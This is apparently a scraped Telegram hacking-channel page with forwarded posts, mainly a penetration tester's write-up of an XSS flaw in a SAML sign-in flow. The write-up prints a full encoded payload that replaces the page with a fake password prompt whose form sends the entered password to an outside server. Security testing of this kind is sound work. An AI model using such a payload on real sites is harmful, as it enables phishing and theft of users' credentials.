UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
🦑How run the Password Reset Flaw | Live PoC - New method

Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE TESTING
Media is too big
VIEW IN TELEGRAM
🦑 The Official NASA CSRF Vulnerability Video
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.

Here’s a snippet of the payload I crafted:

⚠️ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> ⚠️

The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁